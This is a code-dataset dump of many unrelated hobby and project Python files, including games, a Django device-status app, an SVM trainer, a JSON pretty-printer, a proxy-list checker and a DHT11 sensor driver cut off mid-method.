reset()\n _prepare_href_input(\n 'https://www.example.com/bar.tmp| foo.tmp|baz.tmp|http://www.example.com/quux.tmp | xyzzy.prm', # noqa: E501\n local_dir)\n assert prepare_http_input_mock.call_count == 2\n assert 
prepare_file_input_mock.call_count == 3\n","sub_path":"test/test_jupyter_sigplot.py","file_name":"test_jupyter_sigplot.py","file_ext":"py","file_size_in_byte":17764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"357944413","text":"x=input().split(\" \")\nx=[int(i) for i in x]\ncount=0\nfor i in range(x[0],x[1]+1):\n flag=1\n for j in range(2,i):\n if(i%j==0):\n flag=0\n break\n if(flag):\n count+=1\nprint(count)\n","sub_path":"s9.py","file_name":"s9.py","file_ext":"py","file_size_in_byte":191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"352225032","text":"import cv2\nimport numpy as np\nimport glob\nimport os\nimport pickle\n\n\nfrom util.ExtractFeatures import ExtractFeatures\nfrom util.SvmClassifier import SvmClassifier\n\n# Divide up into cars and notcars\nimages = glob.glob('test_images/vehicles_smallset/*/*.jpeg', recursive=True)\ncars = []\nnotcars = []\n\nfor image in images:\n if 'image' in image.split(\"\\\\\")[-1] or 'extra' in image.split(\"\\\\\")[-1]:\n notcars.append(image)\n else:\n cars.append(image)\n\n# Feature extraction\nextractFeatures = ExtractFeatures()\ncar_features = extractFeatures.extract_features_from_paths(cars)\nnot_car_features = extractFeatures.extract_features_from_paths(notcars)\n\n#X = np.vstack((car_features, not_car_features)).astype(np.float64)\nX = np.vstack((car_features, not_car_features)).astype(np.float64)\ny = np.hstack((np.ones(len(car_features)), np.zeros(len(not_car_features))))\n\n# train classifier \nsvm = SvmClassifier()\nsvm.train(X,y)\n\nresult = svm.predict(X)\n\n# save classifier \n\nextracted_features_and_svm = {\"svm\":svm, \"extractFeatures\":extractFeatures}\n\nwith open('extracted_features_and_svm.pk', 'wb') as pickle_file:\n pickle.dump(extracted_features_and_svm, pickle_file)","sub_path":"train_svm.py","file_name":"train_svm.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"390250899","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/romainegele/Documents/Argonne/deephyper/build/lib/deephyper/search/nas/model/space/op/connect.py\n# Compiled at: 2019-07-11 14:24:06\n# Size of source mod 2**32: 1141 bytes\nfrom deephyper.search.nas.model.space.op import Operation\n\nclass Connect(Operation):\n __doc__ = 'Connection node.\\n\\n Represents a possibility to create a connection between n1 -> n2.\\n\\n Args:\\n graph (nx.DiGraph): a graph\\n n1 (Node): starting node\\n n2 (Node): arrival node\\n '\n\n def __init__(self, struct, n1, n2, *args, **kwargs):\n self.struct = struct\n self.n1 = n1\n self.n2 = n2\n\n def __str__(self):\n if type(self.n1) is list:\n if len(self.n1) > 0:\n ids = str(self.n1[0].id)\n for n in self.n1[1:]:\n ids += ',' + str(n.id)\n\n else:\n ids = 'None'\n else:\n ids = self.n1.id\n return f\"{type(self).__name__}_{ids}->{self.n2.id}\"\n\n def init(self):\n \"\"\"Set the connection in the structur graph from [n1] -> n2.\n \"\"\"\n if type(self.n1) is list:\n for n in self.n1:\n self.struct.connect(n, self.n2)\n\n else:\n self.struct.connect(self.n1, self.n2)\n\n def __call__(self, value, *args, **kwargs):\n return 
value","sub_path":"pycfiles/deephyper-0.1.5-py2.py3-none-any/connect.cpython-36.py","file_name":"connect.cpython-36.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"98731592","text":"from IPython.display import clear_output\r\n\r\n# IPython.display only works for Jupyter notebook\r\n\r\ndef display_board(board):\r\n clear_output() # Remember, this only works in jupyter!\r\n availableboard=['#','1','2','3','4','5','6','7','8','9']\r\n print(' Available TIC-TAC-TOE\\n'+\r\n ' Moves\\n\\n '+\r\n board[7]+' | '+board[8]+' | '+board[9]+' '+availableboard[7]+' | '+availableboard[8]+' | '+availableboard[9]+'\\n '+\r\n '----------- -----------\\n '+\r\n board[4]+' | '+board[5]+' | '+board[6]+' '+availableboard[4]+' | '+availableboard[5]+' | '+availableboard[6]+'\\n '+\r\n '----------- -----------\\n '+\r\n board[1]+' | '+board[2]+' | '+board[3]+' '+availableboard[1]+' | '+availableboard[2]+' | '+availableboard[3]+'\\n')\r\n\r\n\r\n\r\ndef rules():\r\n ruleboard=['#','1','2','3','4','5','6','7','8','9']\r\n clear_output() # Remember, this only works in jupyter!\r\n print('The corresponding numbers are representing the input postions.')\r\n print('To input at the particular position input the numeric number representing the position.\\n')\r\n print('Example Board \\n')\r\n print(' ' + ruleboard[7] + ' | ' + ruleboard[8] + ' | ' + ruleboard[9])\r\n print('-----------')\r\n print(' ' + ruleboard[4] + ' | ' + ruleboard[5] + ' | ' + ruleboard[6])\r\n print('-----------')\r\n print(' ' + ruleboard[1] + ' | ' + ruleboard[2] + ' | ' + ruleboard[3])\r\n\r\ndef player_input():\r\n marker = ''\r\n\r\n while not (marker == 'X' or marker == 'O' or marker == 'x' or marker == 'o' or marker == '0' ):\r\n marker = input('Do you want to be X or O? 
')\r\n\r\n if marker.upper() == 'X':\r\n return ('X', 'O')\r\n else:\r\n return ('O', 'X')\r\n\r\ndef place_marker(board, marker, position):\r\n board[position] = marker\r\n\r\ndef win_check(board,mark):\r\n\r\n return ((board[7] == mark and board[8] == mark and board[9] == mark) or # across the top\r\n (board[4] == mark and board[5] == mark and board[6] == mark) or # across the middle\r\n (board[1] == mark and board[2] == mark and board[3] == mark) or # across the bottom\r\n (board[7] == mark and board[4] == mark and board[1] == mark) or # down the middle\r\n (board[8] == mark and board[5] == mark and board[2] == mark) or # down the middle\r\n (board[9] == mark and board[6] == mark and board[3] == mark) or # down the right side\r\n (board[7] == mark and board[5] == mark and board[3] == mark) or # diagonal\r\n (board[9] == mark and board[5] == mark and board[1] == mark)) # diagonal\r\n\r\nimport random\r\n\r\ndef choose_first():\r\n if random.randint(0, 2) == 0:\r\n return 'Player 2'\r\n else:\r\n return 'Player 1'\r\n\r\ndef space_check(board, position):\r\n\r\n return board[position] == ' '\r\n\r\ndef full_board_check(board):\r\n for i in range(1,10):\r\n if space_check(board, i):\r\n return False\r\n return True\r\n\r\ndef player_choice(board):\r\n position = 0\r\n if num=='1':\r\n while position not in [1,2,3,4,5,6,7,8,9] or not space_check(board, position):\r\n if turn == 'Player 1':\r\n position = int(input('Choose your next position: (1-9) '))\r\n else:\r\n position = random.randint(1, 10)\r\n else:\r\n while position not in [1,2,3,4,5,6,7,8,9] or not space_check(board, position):\r\n if turn == 'Player 1':\r\n position = int(input('Player-1 choose your next position: (1-9) '))\r\n else:\r\n position = int(input('Player-2 choose your next position: (1-9) '))\r\n\r\n\r\n\r\n return position\r\n\r\ndef replay():\r\n\r\n return input('Do you want to play again? Enter Yes or No: ').lower().startswith('y')\r\n\r\nprint('Welcome to Tic Tac Toe!')\r\n\r\nnum=0\r\n\r\ndef playernumbers():\r\n global num\r\n till=True\r\n while till:\r\n num = input('How many players will play? 1 or 2: ')\r\n if num=='1':\r\n till=False\r\n elif num=='2':\r\n till=False\r\n\r\n\r\nwhile True:\r\n\r\n rules()\r\n playernumbers()\r\n # Reset the board\r\n theBoard = [' '] * 10\r\n player1_marker, player2_marker = player_input()\r\n turn = choose_first()\r\n if num=='1':\r\n if turn== 'Player 1':\r\n print('You will go first.')\r\n else:\r\n print('Computer will go first.')\r\n else:\r\n print(turn + ' will go first.')\r\n play_game = input('Are you ready to play? Enter Yes or No.')\r\n\r\n if play_game.lower()[0] == 'y':\r\n game_on = True\r\n else:\r\n game_on = False\r\n\r\n while game_on:\r\n if turn == 'Player 1':\r\n # Player's turn.\r\n\r\n display_board(theBoard)\r\n position = player_choice(theBoard)\r\n place_marker(theBoard, player1_marker, position)\r\n\r\n if win_check(theBoard, player1_marker):\r\n display_board(theBoard)\r\n print('Congratulations!, You have won the game!')\r\n game_on = False\r\n else:\r\n if full_board_check(theBoard):\r\n display_board(theBoard)\r\n print('The game is a draw!')\r\n break\r\n else:\r\n turn = 'Player 2'\r\n\r\n else:\r\n # player2's turn.\r\n\r\n display_board(theBoard)\r\n position = player_choice(theBoard)\r\n place_marker(theBoard, player2_marker, position)\r\n\r\n if win_check(theBoard, player2_marker):\r\n display_board(theBoard)\r\n if num=='1':\r\n print('Computer has won!')\r\n else:\r\n print('Congratulations! 
Player 2 has won the game.')\r\n game_on = False\r\n else:\r\n if full_board_check(theBoard):\r\n display_board(theBoard)\r\n print('The game is a draw!')\r\n break\r\n else:\r\n turn = 'Player 1'\r\n\r\n if not replay():\r\n break\r\n\r\n#end\r\n","sub_path":"Tic-Tac-Toe (Jupyter).py","file_name":"Tic-Tac-Toe (Jupyter).py","file_ext":"py","file_size_in_byte":6010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"203729750","text":"import PySimpleGUI as sg\nimport configuracion as config\nimport juego as game\n\n#background = '#000000'\n#sg.SetOptions(background_color=background, element_background_color=background)\n#sg.theme_previewer()\nsg.theme('Light Brown 9')\nlayout = [[sg.Text(\"\")],\n\t\t [sg.Text(\"\")],\n\t\t [sg.Text(\" \"*15),sg.Button(\"\",image_filename=\"./IconosFichas/bienvenida.png\",disabled=False),sg.Text(\" \"*10)],\n\t\t [sg.Text(\"\")],\n\t\t [sg.Text(\"\")],\n\t\t [sg.Text(\"\")],\n\t\t [sg.Text(\"\")],\n\t\t [sg.Text(\"\")],\n\t\t [sg.Text(\" \"*35),sg.Button(\"\",image_filename=\"./IconosFichas/comenzar.png\",disabled=False,key=\"_COMENZAR_\"),sg.Text(\" \"*10)],\n\t\t [sg.Text(\"\")],\n\t\t [sg.Text(\"\"),sg.Button(\"\",image_filename=\"./IconosFichas/configuracion.png\",disabled=False,key=\"_CONFIG_\"),sg.Text(\" \"*20)],\n\t\t [sg.Text(\"\")],\n\t\t [sg.Text(\" \"*55),sg.Button(\"\",image_filename=\"./IconosFichas/salir.png\",disabled=False,key=\"_EXIT_\"),sg.Text(\" \"*25)]]\n\nwindow = sg.Window(\"Scrable Python2020\", layout,size =(800,600))\n\nprogram = True\nevent,values = window.read()\nwhile program:\n\t\n\t\n\tif event is \"_COMENZAR_\":\n\t\t\n\t\tgame.iniciar()\n\t\twindow.close()\n\t\tprogram = False\n\tif event is \"_CONFIG_\":\n\t\t\n\t\tconfig.iniciar()\n\tif event is \"_EXIT_\":\n\t\tprogram= False\n\t\tbreak\n\tevent,values = window.read()\n\nwindow.close()","sub_path":"ScrabbleAR.py","file_name":"ScrabbleAR.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"246050536","text":"from time import sleep\nfrom random import randint as ri\n\ntestArray = [['%s' % \" \".join(['%s' % ((x + 1 * (z + 1)) + y)\n for x in range(20)]) for y in range(40)] for z in range(1500)]\n\nfor i in testArray:\n sleep(0.015)\n print()\n\n # for x in i:\n # \tprint(\"|\" * x)\n # \tsleep(0.1)\n print(\"\\n\".join(i))\n","sub_path":"Old/Single File Projects/Old or Done/random_01.py","file_name":"random_01.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"71784671","text":"#!/usr/bin/python\n\nimport argparse\n\n\ndef find_max_profit(prices):\n profit = 0\n max_profit = -1000000000\n for sell_price_index in range(len(prices) + 1, 0, -1):\n starting_price = sell_price_index\n for buy_price_index in range(sell_price_index + 1, len(prices)):\n profit = prices[buy_price_index] - prices[sell_price_index]\n print(f\"Buy $ {prices[buy_price_index]} - Sell ${prices[sell_price_index]} = ${profit}\")\n if profit > max_profit:\n current_profit = profit\n max_profit = profit\n\n return max_profit\n\n\nlist = [10, 7, 5, 8, 11, 9]\nfind_max_profit(list)\n\n\nif __name__ == '__main__':\n # This is just some code to accept inputs from the command line\n parser = argparse.ArgumentParser(description='Find max profit from prices.')\n parser.add_argument('integers', metavar='N', type=int, nargs='+', help='an integer price')\n args = 
parser.parse_args()\n\n print(\"A profit of ${profit} can be made from the stock prices {prices}.\".format(profit=find_max_profit(args.integers), prices=args.integers))","sub_path":"stock_prices/stock_prices.py","file_name":"stock_prices.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"43518601","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCOMP 5600/6600/6606 FINAL PROJECT\n\nTEAM: 8-BIT BRAIN\n\n@author: Dennis Brown (dgb0028@auburn.edu)\n@author: Shannon McDade (slm0035@auburn.edu)\n@author: Jacob Parmer (jdp0061@auburn.edu)\n\nDESCRIPTION: main - run everything from here\n\nRESOURCES:\n\n\"\"\"\nimport torch\nimport gym\nimport sys\n# from agents.DqnAgent import DqnAgent\nfrom agents.PpoAgent_for_analysis import PpoAgent, run_ppo\n\n\ndef main(ppo=False, dqn=False):\n \"\"\"\n main\n\n Parameters\n ----------\n ppo : BOOLEAN, optional\n SET TO TRUE TO RUN PPO AGENT. The default is False.\n dqn : BOOLEAN, optional\n SET TO TRUE TO RUN DQN AGENT. The default is False.\n\n Returns\n -------\n None.\n\n \"\"\"\n\n # Running DQN Agent\n if dqn:\n env = gym.make('BreakoutDeterministic-v4')\n frame = env.reset()\n\n\n state_size = 8\n print(state_size)\n action_size = env.action_space.n\n print(action_size)\n\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n # agent = DqnAgent(state_size=state_size, action_size=action_size, device=device, seed=0)\n\n\n env.render()\n\n finished = False\n while not finished:\n\n action = env.action_space.sample()\n frame, reward, finished, _ = env.step(action)\n env.render()\n\n # Running PPO Agent\n elif ppo:\n policy = PpoAgent()\n run_ppo(policy, sys.argv[1])\n\n # If neither agent is selected a message will print asking to select one\n else:\n print('No agent selected to run! 
Please select an agent: dqn, ppo')\n\nif __name__ == \"__main__\":\n # Set either ppo or dqn to True\n main(ppo = True)\n","sub_path":"analysis/algorithms/PPO-for-analysis.py","file_name":"PPO-for-analysis.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"311202844","text":"import collections\n\ndef solution(clothes):\n clothes_list = [cloth[1] for cloth in clothes]\n result = collections.Counter(clothes_list)\n count = 1\n for i in list(result.values()):\n count *= (i + 1)\n \n return count - 1\n\n# (의상 종류 + 1)을 모두 곱한 후 -1 => 반드시 하나는 선택\n","sub_path":"Programmers/Level2/위장.py","file_name":"위장.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"338884750","text":"from changes.api.serializer import Serializer, register\nfrom changes.constants import Result\nfrom changes.models.test import TestGroup\n\n\n@register(TestGroup)\nclass TestGroupSerializer(Serializer):\n def serialize(self, instance, attrs):\n data = {\n 'id': instance.id.hex,\n 'job': {'id': instance.job_id.hex},\n 'project': {'id': instance.project_id.hex},\n 'name': instance.name,\n 'shortName': instance.short_name,\n 'duration': instance.duration or 0,\n 'result': instance.result or Result.unknown,\n 'numTests': instance.num_tests or 0,\n 'numFailures': instance.num_failed or 0,\n 'dateCreated': instance.date_created,\n }\n return data\n\n\nclass TestGroupWithJobSerializer(TestGroupSerializer):\n def serialize(self, instance, attrs):\n data = super(TestGroupWithJobSerializer, self).serialize(instance, attrs)\n data['job'] = instance.job\n return data\n\n\nclass TestGroupWithOriginSerializer(TestGroupWithJobSerializer):\n def serialize(self, instance, attrs):\n data = super(TestGroupWithOriginSerializer, self).serialize(instance, attrs)\n data['origin'] = getattr(instance, 'origin', None)\n return data\n","sub_path":"changes/api/serializer/models/testgroup.py","file_name":"testgroup.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"68179642","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.template import loader\nfrom django.http import HttpResponse, Http404, JsonResponse\nfrom django.views.generic import DetailView\n\nfrom rest_framework.views import APIView\nfrom rest_framework.generics import UpdateAPIView,GenericAPIView\nfrom rest_framework.mixins import UpdateModelMixin\nfrom rest_framework.decorators import api_view\nfrom rest_framework import viewsets\n\nfrom .models import Workshop, Device, DEV_TYPE, DEV_STATUS, ZheboDemo\nfrom .serializers import DeviceSerializer, ZheboDemoSerializer\n\n# Create your views here.\ndef get_context():\n workshop = Workshop.objects.filter(name = 'Shanghai').first()\n devices = Device.objects.filter(workshop=workshop)\n context = {\n 'workshop': workshop,\n 'devices': devices,\n 'total_dev': devices.count(),\n 'total_cnc': devices.filter(dev_type = 'CNC').count(),\n 'total_smt': devices.filter(dev_type = 'SMT').count(),\n 'total_inj': devices.filter(dev_type = 'INJ').count(),\n 'total_pnt': devices.filter(dev_type = 'PNT').count(),\n 'total_on': devices.filter(dev_status='ON').count(),\n 'total_off': devices.filter(dev_status='OFF').count(),\n 'total_mnt': 
devices.filter(dev_status='MNT').count(),\n 'total_fix': devices.filter(dev_status='FIX').count(),\n 'cnc_on': devices.filter(dev_type = 'CNC').filter(dev_status='ON').count(),\n 'cnc_off': devices.filter(dev_type = 'CNC').filter(dev_status='OFF').count(),\n 'cnc_mnt': devices.filter(dev_type = 'CNC').filter(dev_status='MNT').count(),\n 'cnc_fix': devices.filter(dev_type = 'CNC').filter(dev_status='FIX').count(),\n 'smt_on': devices.filter(dev_type='SMT').filter(dev_status='ON').count(),\n 'smt_off': devices.filter(dev_type='SMT').filter(dev_status='OFF').count(),\n 'smt_mnt': devices.filter(dev_type='SMT').filter(dev_status='MNT').count(),\n 'smt_fix': devices.filter(dev_type='SMT').filter(dev_status='FIX').count(),\n 'inj_on': devices.filter(dev_type='INJ').filter(dev_status='ON').count(),\n 'inj_off': devices.filter(dev_type='INJ').filter(dev_status='OFF').count(),\n 'inj_mnt': devices.filter(dev_type='INJ').filter(dev_status='MNT').count(),\n 'inj_fix': devices.filter(dev_type='INJ').filter(dev_status='FIX').count(),\n 'pnt_on': devices.filter(dev_type='PNT').filter(dev_status='ON').count(),\n 'pnt_off': devices.filter(dev_type='PNT').filter(dev_status='OFF').count(),\n 'pnt_mnt': devices.filter(dev_type='PNT').filter(dev_status='MNT').count(),\n 'pnt_fix': devices.filter(dev_type='PNT').filter(dev_status='FIX').count(),\n }\n return context\n\ndef index(request):\n context = get_context()\n template = loader.get_template('app/index.html')\n workshop_map = [[None for i in range(4)] for i in range(4)]\n for row in range(4):\n for col in range(4):\n loc_id = row * 4 + col\n device = Device.objects.filter(location_id=loc_id).first()\n if device is not None:\n workshop_map[row][col] = device\n else:\n workshop_map[row][col] = None\n print(workshop_map)\n context['workshopmap'] = workshop_map\n print(context)\n print(request)\n return HttpResponse(template.render(context, request))\n\ndef app_html(request):\n # The template to be loaded as per gentelella.\n\n # All resource paths for gentelella end in .html.\n # Pick out the html file name from the url. 
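    # --- Illustrative aside (hypothetical, not wired in): get_context() above fires
    # one COUNT query per type/status pair. The same numbers can come from a single
    # aggregated query; a sketch using Django's values/annotate grouping over the
    # Device model already imported in this module:
    def _demo_status_counts():
        from django.db.models import Count
        rows = Device.objects.values('dev_type', 'dev_status').annotate(n=Count('pk'))
        # e.g. {('CNC', 'ON'): 12, ('SMT', 'OFF'): 3, ...}
        return {(r['dev_type'], r['dev_status']): r['n'] for r in rows}
    # --- end aside ---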
And load that template.\n context = get_context()\n load_template = request.path.split('/')[-1]\n template = loader.get_template('app/' + load_template)\n print(template)\n print(request)\n return HttpResponse(template.render(context, request))\n\nclass DevInfoDetailView(DetailView):\n template_name = 'app/dev_info.html'\n\n def get_object(self):\n devname = self.kwargs.get(\"devname\")\n if devname is None:\n devname = Device.objects.all().first().name\n return get_object_or_404(Device, name__iexact=devname)\n\n def get_context_data(self, *args, **kwargs):\n context = super(DevInfoDetailView, self).get_context_data(*args, **kwargs)\n query = self.request.GET.get('q')\n print(query)\n qs = Device.objects.filter(name=query)\n print(qs)\n if qs.exists():\n context['device']= qs.first()\n print(context)\n return context\n\nclass DeviceUpdateAPIView(UpdateAPIView):\n queryset = Device.objects.all()\n serializer_class = DeviceSerializer\n\n def get_object(self):\n devname = self.request.data['name']\n qs = Device.objects.filter(name=devname)\n if qs.exists(): # exists() must be called; the bare method object is always truthy\n return qs.first()\n\n def perform_update(self, serializer):\n obj = self.get_object()\n if obj:\n instance = serializer.save()\n\nclass DevStatusAPIView(APIView):\n def get(self, request):\n get = request.GET\n name = get.get('name')\n status = get.get('status')\n print(name)\n print(status)\n device = Device.objects.filter(name=name).first()\n if device is not None:\n device.dev_status = status\n device.save()\n print(device)\n print(device.dev_status)\n d = {\n 'status':1,\n 'message':'success'\n }\n return JsonResponse(d)\n\nclass ZheboDemoViewSet(viewsets.ModelViewSet):\n queryset = ZheboDemo.objects.all()\n serializer_class = ZheboDemoSerializer\n","sub_path":"demo/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"468979689","text":"n = int(input())\r\nd = {}\r\n\r\nfor i in range(n):\r\n surname, initials, phone = input().split()\r\n phone = phone[-2:]\r\n if phone not in d.keys():\r\n d[phone] = 0\r\n d[phone] += 1\r\n\r\navg = sum(d.values()) / len(d)\r\nprint(avg)\r\n","sub_path":"27-8.py","file_name":"27-8.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"121680936","text":"import io\nimport os\nimport json\nimport zipfile\nimport requests\nimport argparse\n\n\ndef extract_zip_file(file_for_extract):\n if zipfile.is_zipfile(io.BytesIO(file_for_extract)):\n extracted_file = zipfile.ZipFile(io.BytesIO(file_for_extract))\n return extracted_file.read(extracted_file.namelist()[0])\n else:\n return file_for_extract\n\n\ndef pretty_print_json(data_dictionary):\n print(json.dumps(\n data_dictionary,\n indent=4,\n sort_keys=True,\n ensure_ascii=False,\n ))\n\n\ndef decode_file(file_for_decoding, codec):\n return file_for_decoding.decode(codec)\n\n\ndef load_json(json_file):\n return json.loads(json_file, encoding='utf-8')\n\n\ndef fetch_web_url(url):\n response = requests.get(url)\n if response.ok:\n return response.content\n\n\ndef read_local_file(path):\n if os.path.isfile(path):\n with open(path, 'rb') as file_to_read:\n return file_to_read.read()\n\n\ndef get_args(\n read_local_file_function,\n fetch_web_url_function,\n list_of_allowable_codecs,\n):\n parser = argparse.ArgumentParser(\n description='Print JSON files in correct and readable form'\n )\n parser.add_argument(\n 'path',\n metavar='path',\n 
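# positional argument: a local filesystem path or an http(s) URL\n 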
type=str,\n help='File path: local or URL',\n )\n parser.add_argument(\n '-l',\n '--local',\n dest='load_data',\n action='store_const',\n const=read_local_file_function,\n default=fetch_web_url_function,\n help='Use if you print a local JSON file',\n )\n parser.add_argument(\n '-c',\n '--codec',\n action='store',\n nargs='?',\n default='utf_8',\n choices=list_of_allowable_codecs,\n help='Use to decode the original file',\n )\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n codecs = [\n 'utf_8',\n 'cp1251',\n 'koi8_r',\n 'cp866',\n 'mac_cyrillic',\n ]\n args = get_args(\n read_local_file_function=read_local_file,\n fetch_web_url_function=fetch_web_url,\n list_of_allowable_codecs=codecs,\n )\n try:\n json_file = args.load_data(args.path)\n if json_file is None:\n print('{} {} {}'.format(\n 'Filepath',\n args.path,\n 'is not correct, check it',\n ))\n else:\n received_data = load_json(\n decode_file(\n extract_zip_file(json_file),\n args.codec,\n ),\n )\n pretty_print_json(received_data)\n\n except (requests.exceptions.RequestException, IOError) as error:\n print('{}\\n{} {}\\n{}\\n{}'.format(\n error,\n 'Cannot open the file:',\n args.path,\n 'Check your internet connection or that the file path is correct',\n 'For opening a local file use \"-l\" command string option',\n ))\n except ValueError as error:\n print('{}\\n{} {} {} {}'.format(\n error,\n 'Cannot decode file with',\n args.codec,\n 'codec or cannot read it. Check this JSON file',\n 'with a validator or try to use another codec!',\n ))\n","sub_path":"pprint_json.py","file_name":"pprint_json.py","file_ext":"py","file_size_in_byte":3210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"42336800","text":"import requests\n\nclass ProxyPool(object):\n def __init__(self):\n self.url = 'http://dev.kdlapi.com/api/getproxy/?orderid=967108906914177&num=55&protocol=2&method=2&an_an=1&an_ha=1&sep=1'\n self.headers = {'User-Agent':''}\n\n def save_proxy(self):\n html = requests.get(url=self.url,headers=self.headers).text\n # ip_list: ['1.1.1.1:8888','']\n ip_list = html.split('\r\n')\n print(ip_list)\n for ip in ip_list:\n # test each ip and save the usable ones to a file\n if self.test_ip(ip):\n # append the ip to the file\n with open('ip.txt','a') as f:\n f.write(ip + '\n')\n\n # check whether a proxy ip is usable\n def test_ip(self,ip):\n proxies = {\n 'http':'http://{}'.format(ip),\n 'https':'https://{}'.format(ip)\n }\n try:\n res = requests.get(\n url='http://www.baidu.com/',\n proxies=proxies,\n timeout=2\n )\n if res.status_code == 200:\n print(ip,'usable')\n return True\n except Exception as e:\n print(ip,'not usable')\n return False\n\nif __name__ == '__main__':\n spider = ProxyPool()\n spider.save_proxy()\n","sub_path":"4号爬虫工具箱/ip代理池/05/day05代码/01_proxypool.py","file_name":"01_proxypool.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"397286643","text":"#!/usr/bin/env python\nimport threading\n\nimport pigpio\nimport time\n\n\nclass DHT11Sensor:\n \"\"\"\n Original Source:\n http://www.raspberrypi.org/forums/viewtopic.php?p=515575#p515575\n\n A class to read relative humidity and temperature from the\n DHT11 sensor. The sensor is also known as the AM2302.\n\n The sensor can be powered from the Pi 3V3 or the Pi 5V rail.\n\n Powering from the 3V3 rail is simpler and safer. 
You may need\n to power from 5V if the sensor is connected via a long cable.\n\n For 3V3 operation connect pin 1 to 3V3 and pin 4 to ground.\n\n Connect pin 2 to a gpio.\n\n For 5V operation connect pin 1 to 5V and pin 4 to ground.\n\n The following pin 2 connection works for me. Use at YOUR OWN RISK.\n\n 5V--5K_resistor--+--10K_resistor--Ground\n |\n DHT11 pin 2 -----+\n |\n gpio ------------+\n \"\"\"\n\n def __init__(self, gpio):\n \"\"\"\n Instantiate with the gpio to which the DHT11 output pin is connected.\n \"\"\"\n self.gpio = gpio\n # leading underscores keep these counters from shadowing the\n # bad_checksum()/timed_out() accessor methods defined below\n self._bad_checksum = 0\n self._bad_timeout = 0\n self.accumulating = False\n self.relative_humidity = -999\n self.temp = -999\n self.tov = None\n self.tick = 0\n\n # reset in trigger\n self.bit = -3 # header bits\n self.hum_high_byte = 0\n self.hum_low_byte = 0\n self.temp_high_byte = 0\n self.temp_low_byte = 0\n self.checksum = 0\n\n pigpio.set_mode(gpio, pigpio.INPUT)\n pigpio.set_pull_up_down(gpio, pigpio.PUD_UP)\n self.cb = pigpio.callback(gpio, pigpio.EITHER_EDGE, self._cb)\n self.auto_update()\n\n def _cb(self, gpio, level, tick):\n \"\"\"\n Accumulate the 40 data bits. Format into 5 bytes, humidity high,\n humidity low, temperature high, temperature low, checksum.\n \"\"\"\n if self.accumulating:\n if level == 0:\n diff = pigpio.tickDiff(self.tick, tick)\n\n # edge length determines if bit is 1 or 0\n if diff >= 50:\n val = 1\n else:\n val = 0\n\n if self.bit >= 32: # in checksum byte\n self.checksum = (self.checksum << 1) + val\n if self.bit >= 39:\n # 40 bits received\n self.accumulating = False\n pigpio.set_watchdog(self.gpio, 0)\n total = self.hum_high_byte + self.hum_low_byte + self.temp_high_byte + self.temp_low_byte\n\n if (total & 255) == self.checksum: # is checksum ok\n self.relative_humidity = self.adjust_humidity()\n self.temp = self.adjust_temperature()\n self.tov = time.time()\n else:\n self._bad_checksum += 1\n\n elif self.bit >= 24: # in temp low byte\n self.temp_low_byte = (self.temp_low_byte << 1) + val\n elif self.bit >= 16: # in temp high byte\n self.temp_high_byte = (self.temp_high_byte << 1) + val\n elif self.bit >= 8: # in humidity low byte\n self.hum_low_byte = (self.hum_low_byte << 1) + val\n elif self.bit >= 0: # in humidity high byte\n self.hum_high_byte = (self.hum_high_byte << 1) + val\n else: # header bits\n pass\n self.bit += 1\n\n elif level == 1:\n self.tick = tick\n if self.bit == -3: # correct for first reading\n self.bit = -2\n\n else: # level == pigpio.TIMEOUT:\n # time out if less than 40 bits received\n self.accumulating = False\n pigpio.set_watchdog(self.gpio, 0)\n self._bad_timeout += 1\n\n else: # perhaps a repeated watchdog\n if level == pigpio.TIMEOUT:\n pigpio.set_watchdog(self.gpio, 0)\n\n def temperature(self):\n \"\"\"Return current temperature.\"\"\"\n return self.temp\n\n def temperature_f(self):\n return int(float(9.0 / 5.0 * self.temperature() + 32))\n\n def humidity(self):\n \"\"\"Return current relative humidity.\"\"\"\n return self.relative_humidity\n\n def staleness(self):\n \"\"\"Return time since measurement made.\"\"\"\n if self.tov is not None:\n return time.time() - self.tov\n else:\n return -999\n\n def bad_checksum(self):\n \"\"\"Return count of messages received with bad checksums.\"\"\"\n return self._bad_checksum\n\n def timed_out(self):\n \"\"\"Return count of messages which have timed out.\"\"\"\n return self._bad_timeout\n\n def trigger(self):\n 